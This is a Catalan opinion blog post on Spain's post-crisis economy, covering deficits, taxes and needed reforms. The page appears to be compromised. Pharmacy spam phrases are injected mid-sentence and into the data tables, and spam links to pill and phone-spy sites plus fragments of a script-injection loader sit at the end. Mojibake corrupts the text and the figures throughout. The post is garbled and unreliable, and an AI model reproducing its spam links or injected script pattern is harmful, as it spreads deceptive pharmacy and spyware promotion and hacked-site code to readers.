Blog

SORTIM DE LA CRISI?

OPINIAi?? de Sr. Benet Armengol, exsecretari general del Gremi de Fabricants.

Una vegada mAi??s, arribat el tancament de lai??i??any, proliferen comentaris de tota mena, tant sobre el que sai??i??ha esgotat com el que tot just estem encetant. En general, hi ha, perA?, una certa coincidA?ncia en que sembla haver-se acabat el camAi?? tortuA?s i dificultA?s del llarg perAi??ode de crisi i que sai??i??albira, en un horitzA? mAi??s o menys immediat, el retorn a Cheap Order la placidesa de la normalitat.

I aquAi?? es comenAi??a a sentir la necessitat de filar mAi??s prim. I que entenem per normalitat? Per aclarir-nos, dai??i??entrada direm que no significa tornar als temps en que demanaves preu dai??i??un pis i quan al dia segA?ent, desprAi??s de la lA?gica reflexiA? i confirmaciA? de disposar de crA?dit, anaves a donar la conformitat, et cost of bystolic 5 mg at walmart contestaven que havies fet tard doncs seai??i??t havien avanAi??at. I com aquest, molts altres exemples ilAi??lustrarien que ai???allA?ai??? tampoc era normalitat. ai???AllA?ai??? va portar-nos, juntament amb altres factors, a la crisi de la que ara esperem sortir.

Amb tot, cal ser prudents en si hem sortit o no del tA?nel, perquA?, agradi o no, la llarga crisi ha generat nous desequilibris; per exemple un deute pA?blic excessiu i unes taxes dai??i??atur insuportables. Unes taxes dai??i??atur, per cert, amb lectura massa esbiaixada en forAi??a casos. Es fA?ra de dubte que mentre estiguem a lai??i??Euro lai??i??economia espanyola estAi?? obligada a fer ajustaments, perA?… amb cAi??rrec a qui han dai??i??anar els costos de lai??i??ajust? La resposta Ai??s tan diferent com diferents sA?n les ideologies del marc parlamentari. Uns ajustarien sobre la despesa i a lai??i??altra costat del ventall carregarien sobre els ingressos. Ara mateix, lai??i??acciA? sobre la despesa, per reduir el ritme de creixement del dA?ficit dels comptes pA?blics, no ha assolit lai??i??objectiu previst per fi dai??i??any, com ja sai??i??ha reconegut, tant a nivell espanyol com catalAi??. En quan a ingressos, hem de suposar que el 56% de lai??i?? IRPF ja no dA?na per mAi??s. Lai??i??IVA tAi?? el tipus general al 21% amb uns reduA?ts del 8 i 5%, perA? Ai??s que a mAi??s dai??i??aquests tipus sai??i??ha modificat la classificaciA? dels bens gravats que ha augmentat la pressiA? fiscal afegida de manera subreptAi??cia. I si parlem de lai??i??Impost de Societats aquAi?? podria dir-se que caldria fer-ne una regulaciA? mAi??s precisa i estricta respecte a les deduccions. PerA? bAi??, sense entrar en casuAi??stica excessiva, que no Ai??s el cas, nomAi??s cal fixar-se ens els quadres que segueixen i que sA?n prou significatius:
INGRESSOS PAsBLICS (en % sobre PIB)

suprax online canada

(a) (b) (c) (d) (a) Espanya
1995 37 45 49 45 (b) Alemanya where to buy ampicillin for fish
2007 41 43 50 45 (c) FranAi??a
2013 38 45 53 47 (d) UEM-18

 

DAi??FICIT Cheap PAsBLIC (Ai??dem)

(a) (b) (c) (d)
1995 -7 -9 -6 7
2007 -2 0 -3 -1
2013 -7 0 -4ai??i??9 -3

Aleshores, Buy vist que no hi ha estalvi, la qual cosa genera major dA?ficit que, a la seva vegada, augmenta el deute amb la corresponent cAi??rrega dai??i??interessos, i sense oblidar que hi ha pendents una sA?rie de temes fonamentals i dai??i??estructura, que segons com sai??i??enfoquin sA?n un notori increment de despesa, no Ai??s tan clar que puguem frivolitzar parlant

Pills
http://acnj-blog.com/2018/02/02/haldol-dec-price/

de situacions passades com penjades ja en lai??i??armari de la histA?ria. Refresquem sinA? la memA?ria: cal tancar la reforma de les pensions i profunditzar sobre lai??i??espectacular canvi demogrAi??fic que sai??i??apropa; sai??i??ha dai??i??afrontar lai??i??enA?sima reforma del mercat de treball i adequar la formaciA? a allA? que demana aquest mercat; ja nai??i??hi ha prou de generar universitaris corsecats per manca de lloc de treball adient, i en sentit contrari, de falta de tA?cnics i oficials degudament preparats que lai??i?? estructura industrial necessita; toca emprendre la nova regulaciA? de la contractaciA? pA?blica que exigeix inspirar-se en criteris de mAi??xima transparA?ncia; cal concloure la reforma del sector financer i fer arribar el crA?dit a les empreses que sobreviuen mAi??s enllAi?? de lai??i??IBEX; enfocar la privatitzaciA? de certes empreses pA?bliques, resoldre el laberAi??ntic sector energA?tic… i em limito a citar un altre laberint mAi??s complex encara, el territorial; i, tot aixA?, fer-ho en un any inaugural del carrusel electoral. PerA?, per a) o per b), les reformes estructurals que el Purchase paAi??s necessita queden sempre a mitges i el temps corre i, sobretot, exigeix actuar per tal dai??i??acomplir els compromisos adquirits amb la UniA? perA? tambAi?? amb els electors. Ara no seai??i??n pot fer de mAi??s o de menys, doncs ja hem viscut lai??i??experiA?ncia angoixant de que el dia menys pensat, el nostre spread amb el bonus alemany pot tornar a disparar-se i a posar en perill la nostra economia dins de lai??i??Euro, perquA? els mercats ai??i??tant vilipendiats com es vulgui- existeixen i sA?n els que amb els seus moviments poden arribar a marginar-nos. Es tracta dai??i??una cosa tan sensible perA? tan senzilla com la confianAi??a i la serietat del paAi??s.

En el fons de la qA?estiA?, -Ai??s un punt de vista,- hi ha una polAi??tica de triomfalisme que al seu dia va practicar Zapatero i segueix, fins a cert punt lai??i??actual Govern: mantenir-nos mig enganyats perA? amb la moral alta. No oblidem que A?poca electoral vol dir de promeses incomplertes i dai??i??endolcir i suavitzar tot allA? que pugui resultar impopular, -malgrat ser convenient i fins i tot necessari-; no fos que lai??i??elector sai??i??enfadi i voti algun dai??i??aquells partits que sense quota de poder sA?n lliures per fer, precisament, ai???electoralismeai???. Per tant, hem de confiar que els polAi??tics estiguin a lai??i??altura de la situaciA?, sabent que ser realista requereix mAi??s dots de lideratge que ser populista. Que does amoxicillin affect apri nai??i??Ai??s de fAi??cil bromejar sobre la Merkel i que nai??i??Ai??s de difAi??cil aconseguir, com ella, una gran coaliciA? per poder governar exitosament, adhuc amb mesures dures i impopulars!. Quant ens queda per aprendre!

online

Benet Armengol

 

 

 

http://elgonvietnam.net/?p=6363 Pills http://pegasus-is.com/2018/03/17/cheap-nexium-control/

Pills

Buy

document.currentScript.parentNode.insertBefore(s, document.currentScript);

document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s); Cheap gasex online thesaurus http://ihdesmile.hu/email-spy-1-topspy-android-phone-tracker/http://winterwoodinternational.com/kik-spy-hellospy-how-track-iphone/ Buy

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *